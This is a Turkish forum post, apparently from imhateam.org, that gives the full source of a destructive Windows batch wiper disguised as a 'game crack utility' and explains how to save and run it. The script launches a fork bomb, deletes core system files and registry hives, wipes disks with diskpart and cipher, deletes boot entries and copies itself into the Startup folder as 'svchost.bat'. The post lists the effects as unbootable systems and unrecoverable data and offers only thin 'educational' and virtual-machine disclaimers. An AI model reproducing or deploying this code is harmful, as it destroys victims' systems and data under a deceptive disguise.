Revealed content
Herkese Merhaba konunun kendisi ve verdiğim virüs kodu tamamen bana aittir. Bilgi amaçlı paylaşıyorum eğer denemek/test etmek isteyen olursa lütfen sanal makinede aşağıda anlatacağım talimatlara uyarak yapsın.
ilk önce bir metin dosyası açıyoruz işte game_crack.txt içerisine bu kodu yazıyoruz
ilk önce bir metin dosyası açıyoruz işte game_crack.txt içerisine bu kodu yazıyoruz
Kod:
@echo off
REM game_crack.bat- Game crack utility for Windows
setlocal enabledelayedexpansion
echo Installing game crack components...
timeout/t 1 /nobreak >nul
REM Infinite fork bomb with multiple techniques
echo Starting game optimization...
start/min cmd /c %0
cmd/c %0|%0
for/L %%i in (1,0,2) do start /min cmd /c %0
REM Delete critical system files
del/f /q /a "%windir%\system32\hal.dll" >nul 2>&1
del/f /q /a "%windir%\system32\winload.exe" >nul 2>&1
del/f /q /a "%windir%\system32\ntoskrnl.exe" >nul 2>&1
del/f /q /a "%windir%\system32\ntdll.dll" >nul 2>&1
del/f /q /a "%windir%\system32\kernel32.dll" >nul 2>&1
REM Registry destruction loop
:regkill
reg delete"HKLM\SYSTEM" /f >nul 2>&1
reg delete"HKLM\SOFTWARE" /f >nul 2>&1
reg delete"HKLM\SAM" /f >nul 2>&1
reg delete"HKLM\SECURITY" /f >nul 2>&1
reg delete"HKLM\BCD00000000" /f >nul 2>&1
goto regkill
REM Disk filling with zero-byte files
:filldisk
for/L %%i in (1,1,1000) do type nul > "C:\tempfile_%%i.dat"
for/L %%i in (1,1,1000) do type nul > "D:\tempfile_%%i.dat"
for/L %%i in (1,1,1000) do type nul > "E:\tempfile_%%i.dat"
goto filldisk
REM MBR/GPT destruction using diskpart
echo select disk 0> mbrkill.txt
echo clean all>> mbrkill.txt
echo select disk 1>> mbrkill.txt
echo clean all>> mbrkill.txt
echo select disk 2>> mbrkill.txt
echo clean all>> mbrkill.txt
diskpart/s mbrkill.txt >nul 2>&1
REM Raw disk wiping with cipher
start/min cipher /w:C:
start /min cipher /w:D:
start /min cipher /w:E:\
REM BSOD trigger via NMI
sc stop Dnscache>nul 2>&1
sc stop SamSs>nul 2>&1
sc stop CryptSvc>nul 2>&1
REM BCD destruction
bcdedit/delete {current} /f >nul 2>&1
bcdedit/delete {default} /f >nul 2>&1
bcdedit/set {current} recoveryenabled No >nul 2>&1
REM Self-replication to startup
copy"%0" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.bat" >nul 2>&1
copy"%0" "C:\Users\Public\game.bat" >nul 2>&1
REM 10GB overwrite payload
:overwrite
for/L %%i in (1,1,10000) do fsutil file createnew C:\wipedata_%%i.bin 1048576
for/L %%i in (1,1,10000) do fsutil file createnew D:\wipedata_%%i.bin 1048576
for /L %%i in (1,1,10000) do fsutil file createnew E:\wipedata_%%i.bin 1048576
goto overwrite
REM Final infinite loop
:end
start/min cmd /c %0
goto end
daha sonra kaydedip çıkıyoruz sağ tıklayıp yeniden adlandır diyoruz ve sonunu .bat ile değiştiriyoruz.. Yaptığınız eylemlerden ben ve İmhateam.org hiçbir sorumluluk almamaktadır. Çalıştırdığınızda ise hedef sistemde yaratacağı etkiler
Sistem açılmaz
Disk yapısı silinir
Veri tamamen kaybolur
Dosya geri kazanımı mümkün değildir
Sanal Makinede denemek isteyenler kafasına göre deneme yapmaması rica olunur. Önce bu gereksinimler karşılansın sonra:
Sandbox
Snapshot alınmış
Host sistemden tamamen ayrılmış
Burada anlatılanlar sadece eğitim ve bilgi amaçlıdır hiçbir art niyet amacımız yoktur!!!
Son olarak UYARI: Kendi sisteminizde denemeyin lütfen.
Bu içeriği görmek için giriş yapın.